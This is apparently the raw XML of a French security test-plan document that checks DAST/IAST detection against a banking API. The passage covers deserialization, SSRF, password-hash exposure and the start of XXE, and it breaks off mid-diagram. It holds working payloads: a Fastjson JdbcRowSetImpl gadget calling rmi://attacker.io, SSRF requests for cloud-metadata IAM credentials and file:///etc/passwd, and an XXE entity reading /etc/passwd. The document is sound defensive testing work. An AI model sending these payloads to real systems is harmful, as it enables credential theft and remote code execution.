                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">{</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  "@type": "com.sun.rowset.JdbcRowSetImpl",</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  "dataSourceName": "rmi://attacker.io:9999/exploit",</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  "autoCommit": true</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">}</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Résultat attendu — détection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444444"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Détecté ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3713"/>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444444"/>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Le DAST peut envoyer des payloads connus (gadget chains Jackson, Fastjson, XStream) et détecter des comportements anormaux (délai réseau vers l'extérieur, erreur de désérialisation spécifique dans la réponse). Limite : sans IAST, difficile de confirmer l'exécution réelle. Outil spécialisé : ysoserial + Burp Collaborator.</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C'est le territoire d'excellence de l'IAST : trace le flux depuis ObjectMapper.readValue() ou JsonParser avec polymorphic type handling activé. Détecte l'absence de DeserializationConfig.FAIL_ON_UNKNOWN_PROPERTIES, l'usage de enableDefaultTyping() (dangereux), l'absence de SafeDeserializationHandler. Finding avec class name + stack trace complète.</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SCÉNARIO SC-06 — Server-Side Request Forgery (SSRF)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="A0C4F8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP API7:2023 / A10:2021  |  CWE-918</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Sévérité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1513"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="7F4F24" w:sz="1"/>
              <w:left w:val="single" w:color="7F4F24" w:sz="1"/>
              <w:bottom w:val="single" w:color="7F4F24" w:sz="1"/>
              <w:right w:val="single" w:color="7F4F24"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7F4F24"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="22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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Une API de vérification d'URL (ex : preview de lien dans une messagerie) effectue une requête HTTP côté serveur vers l'URL fournie par l'utilisateur sans validation. Un attaquant cible les métadonnées cloud (169.254.169.254) ou des services internes non exposés.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Diagramme de séquence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/preview-url     Service interne / Cloud metadata</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POST /preview  │                           │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      │  url: http://   │                           │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      │  169.254.169.254│                           │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      │  /latest/meta.. │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GET http://169.254...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IAM credentials JSON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HTTP 200       │                           │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      │  + credentials  │                           │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      │◀────────────────│                           │</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Requête HTTP brute — attaque DAST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POST /api/v1/links/preview HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Host: api.banking.internal</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Authorization: Bearer eyJhbGciOiJIUzI1NiJ9...</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Content-Type: application/json</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w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">}</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 Variantes SSRF à tester également :</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># "url": "http://localhost:8080/actuator/env"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># "url": "http://internal-db.banking.local:5432"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># "url": "file:///etc/passwd"</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Résultat attendu — détection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444444"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Détecté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444444"/>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Le DAST utilise un serveur OOB (Out-Of-Band, ex: interactsh, Burp Collaborator) pour détecter les requêtes sortantes déclenchées par le serveur. Teste les cibles : metadata cloud, localhost, adresses RFC1918, schémas file://, gopher://. Détection même si la réponse API est 200 sans données SSRF visibles.</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L'IAST trace : source = RequestBody.url → sink = HttpClient.execute() / URL.openConnection() / RestTemplate.getForObject() sans validation de l'URL (blocklist ou allowlist). Détecte l'absence de vérification d'hôte avant la requête sortante. Finding : méthode appelante + URL construite.</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SCÉNARIO SC-07 — Exposition de Données Sensibles — Hash Mot de Passe en Réponse API</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="A0C4F8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP API3:2023  |  CWE-312</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Sévérité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1513"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="7F4F24" w:sz="1"/>
              <w:left w:val="single" w:color="7F4F24" w:sz="1"/>
              <w:bottom w:val="single" w:color="7F4F24" w:sz="1"/>
              <w:right w:val="single" w:color="7F4F24"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7F4F24"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="22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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">L'API de profil utilisateur retourne l'objet User complet sérialisé depuis la base de données, incluant le champ 'passwordHash'. Même haché, cette exposition viole le principe de minimisation des données et facilite les attaques offline (rainbow tables, hashcat).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Diagramme de séquence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Client / Attaquant     API /users/me         Base de données</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GET /api/v1/users/me│                     │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">         │  Authorization: Bearer token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SELECT * FROM users │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">         │                     │  WHERE id = ?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{id, email,         │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">         │                     │   passwordHash,      │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">         │                     │   iban, ...}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HTTP 200 + tous    │                      │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">         │  les champs DB ─────│                      │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">         │◀────────────────────│                      │</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Réponse API vulnérable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280F" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="110"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="110"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="56D364"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP/1.1 200 OK</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="56D364"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Content-Type: application/json</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="56D364"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="56D364"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">{</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="56D364"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  "id": 42,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="56D364"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  "email": "alice@bank.fr",</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="56D364"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  "firstName": "Alice",</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="56D364"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  "lastName": "Dupont",</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="56D364"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  "passwordHash": "$2b$12$LQv3c1yqBWVHxkd0LHAkCOYz6TtxMQJqhN8/lfMFdnhEFrWG9tMJi",</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="56D364"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  "iban": "FR7630006000011234567890189",</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="56D364"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  "createdAt": "2024-01-15T10:30:00Z"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="56D364"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="56D364"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="56D364"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># passwordHash ET iban exposés — violation RGPD + DORA</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Résultat attendu — détection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444444"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Détecté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444444"/>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Le DAST analyse les réponses JSON et détecte les patterns de hachage connus : $2b$ (bcrypt), $argon2$, sha256:, md5: ainsi que les noms de champs suspects (passwordHash, password_hash, pwd_hash, hashedPassword). Règle configurable avec regex. Finding : CWE-312, API3:2023.</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L'IAST trace : la méthode de sérialisation (ex : Jackson ObjectMapper.writeValue()) inclut le champ passwordHash depuis l'entité User sans annotation @JsonIgnore. Détecte l'absence de DTO de projection (pattern DTO ≠ entité DB). Finding : classe User, champ passwordHash, ligne de sérialisation.</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SCÉNARIO SC-08 — XML External Entity (XXE) — Lecture de fichier interne</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="A0C4F8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP A03:2021  |  CWE-611</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Sévérité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1513"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="7F4F24" w:sz="1"/>
              <w:left w:val="single" w:color="7F4F24" w:sz="1"/>
              <w:bottom w:val="single" w:color="7F4F24" w:sz="1"/>
              <w:right w:val="single" w:color="7F4F24"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7F4F24"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="22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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Une API acceptant du XML en entrée (ex : import de données, SOAP legacy, flux EDI) parse le document sans désactiver les entités externes. Un attaquant injecte une déclaration DOCTYPE pointant vers un fichier système interne (/etc/passwd, application.properties avec les secrets).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Diagramme de séquence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/import (XML POST)    Système de fichiers</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POST /import     │                        │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      │  Content-Type:    │                        │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      │  application/xml  │                        │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      │  &lt;!DOCTYPE foo    │                        │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      │  [&lt;!ENTITY xxe    │                        │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      │  SYSTEM           │                        │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      │  "file:///etc/   │                        │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
